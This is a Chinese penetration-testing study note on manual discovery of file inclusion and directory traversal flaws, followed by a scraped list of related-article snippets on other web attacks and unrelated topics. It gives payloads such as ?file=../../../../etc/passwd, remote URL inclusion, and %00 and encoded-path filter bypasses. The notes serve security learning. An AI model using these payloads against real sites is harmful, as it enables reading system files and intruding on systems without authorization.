手动挖掘漏洞(二)

漏洞特征

?page=a.php

?home=b.html

?file=content

经典测试方式

?file=../../../../etc/passwd  根据相对路径加载文件

?file=/etc/passwd 根据绝对路径加载文件

?page=file:///etc/passwd

?home=main.cgi

?page=http://www.a.com/1.php 根据外部url,加载远程文件

http://1.1.1.1/../../../../dir/file.txt

根据外部url加载远程文件

有时候加载文件时,比如

?file=/etc/passwd

可能会提示/etc/passwd.php文件找不到,这是因为网站开发者可能用了某些过滤机制在文件名后面自动补全为.php文件,我们只时想找passwd这个文件并不希望去找一个.php文件,这时我们需要绕过字符的过滤,php5.3以前,通过一些简单地修改就能绕过过滤:

加“.” : ?file=/etc/passwd.

加“%00” : ?file=/etc/passwd%00    ,%00表示null

../url编码为%2e%2e%2f

..\编码为%2e%2e%5c

../双层编码为%252e%252e%255c

时间: 2024-10-25 06:48:00

手动挖掘漏洞(二)的相关文章

手动挖掘漏洞(三)

在kali系统中默认包含了一些注入文件 /usr/share/wfuzz/wordlist/injections里面 文件上传漏洞 比如一些上传图片的高安全级别过滤机制,会检查请求头中图片的大小,和图片的类型,甚至是检查图片文件的内容,根据图片的前10个字节里的信息判断这个文件是否是真实的图片文件 如果有一个这样一个上传图片文件的上传点,我们如何突破web应用的过滤呢? 首先先准备一张图片2.png 先启动burpsuite,并开启截断功能 在页面中点击上传文件 把准备好的文件上传上去 在bur

【安全牛学习笔记】手动漏洞挖掘(二)

手动漏洞挖掘 身份认证 常用弱口令/基于字典的密码破爆破 锁定账号 信息收集 手机号 密码错误提示信息 密码嗅探 手动漏洞挖掘 会话sessionID Xss / cookie importer SessionID in URL 嗅探 sessionID长期不变 / 永久不变 sessionID生成算法 Sequencer 私有算法 预判下一次登录时生成的SessionID 登出后返回测试 手动漏洞挖掘 密码找回 https://www.example.com/[email protected]

小白日记36:kali渗透测试之Web渗透-手动漏洞挖掘(二)-突破身份认证,操作系统任意命令执行漏洞

手动漏洞挖掘 ###################################################################################### 手动漏洞挖掘原则[会比自动扫描器发现的漏洞要多,要全面] 1.每一个变量都进行尝试 2.所有头[如:cookie中的变量] 3.逐个变量删除 #####################################################################################

Frequent Pattern 挖掘之二(FP Growth算法)(转)

FP树构造 FP Growth算法利用了巧妙的数据结构,大大降低了Aproir挖掘算法的代价,他不需要不断得生成候选项目队列和不断得扫描整个数据库进行比对.为了达到这样的效果,它采用了一种简洁的数据结构,叫做frequent-pattern tree(频繁模式树).下面就详细谈谈如何构造这个树,举例是最好的方法.请看下面这个例子: 这张表描述了一张商品交易清单,abcdefg代表商品,(ordered)frequent items这一列是把商品按照降序重新进行了排列,这个排序很重要,我们操作的所

数据挖掘算法之关联规则挖掘(二)FPGrowth算法

之前介绍的apriori算法中因为存在许多的缺陷,例如进行大量的全表扫描和计算量巨大的自然连接,所以现在几乎已经不再使用 在mahout的算法库中使用的是PFP算法,该算法是FPGrowth算法的分布式运行方式,其内部的算法结构和FPGrowth算法相差并不是十分巨大 所以这里首先介绍在单机内存中运行的FPGrowth算法 还是使用apriori算法的购物车数据作为例子,如下图所示: TID为购物车项的编号,i1-i5为商品的编号 FPGrowth算法的基本思想是,首先扫描整个购物车数据表,计算

手动实现redux(二)

一个app中store(状态树)是唯一的 我们知道对于一个app, store应该是唯一,集中用reducer管理的,那么当app中有多个页面,每个页面有多个组件时,就应该有多个reducer来管理. 当我某个组件dispatch出去一个action(动作)时,store接收到action,应该交给谁来管理呢?这里我们暂时无法使store根据不同的action来交由相应的reducer处理. combineReducer combineReducer函数将多个不同的reducer整合在一起,然后

小白日记37:kali渗透测试之Web渗透-手动漏洞挖掘(三)-目录遍历、文件包含

手动漏洞挖掘 漏洞类型 #Directory traversal 目录遍历[本台机器操作系统上文件进行读取] 使用者可以通过浏览器/URL地址或者参数变量内容,可以读取web根目录[默认为:/var/www/]之外的其他操作系统文件(如:/etc/passwd/).形成根源:目录权限限制不严格 #File include文件包含[1.include本地文件包含LFI:2.远程系统文件包含RFI(可传入木马)] 通常为如include函数,可以将web根目录以外的目录包含进来.根源:include

黑盒审计之注入漏洞挖掘思路分享

作者:viekst 0x01 注入漏洞简介 注入漏洞是web应用中最常见的安全漏洞之一,由于一些程序没有过滤用户的输入,攻击者通过向服务器提交恶意的SQL查询语句,应用程序接收后错误的将攻击者的输入作为原始SQL查询语句的一部分执行,导致改变了程序原始的SQL查询逻辑,额外的执行了攻击者构造的SQL查询语句,从而导致注入漏洞的产生. 攻击者通过SQL注入可以从数据库获取敏感信息,或者利用数据库的特性执行添加用户,导出文件等一系列恶意操作.常见的建站系统出现SQL注入漏洞风险概率是非常高的,而本文

D-Link系列路由器漏洞挖掘入门

D-Link系列路由器漏洞挖掘入门 前言 前几天去上海参加了geekpwn,看着大神们一个个破解成功各种硬件,我只能在下面喊 6666,特别羡慕那些大神们.所以回来就决定好好研究一下路由器,争取跟上大神们的步伐.看网上公开的D-Link系列的漏洞也不少,那就从D-Link路由器漏洞开始学习. 准备工作 既然要挖路由器漏洞,首先要搞到路由器的固件. D-Link路由器固件下载地址: ftp://ftp2.dlink.com/PRODUCTS/ 下载完固件发现是个压缩包,解压之后里面还是有一个bin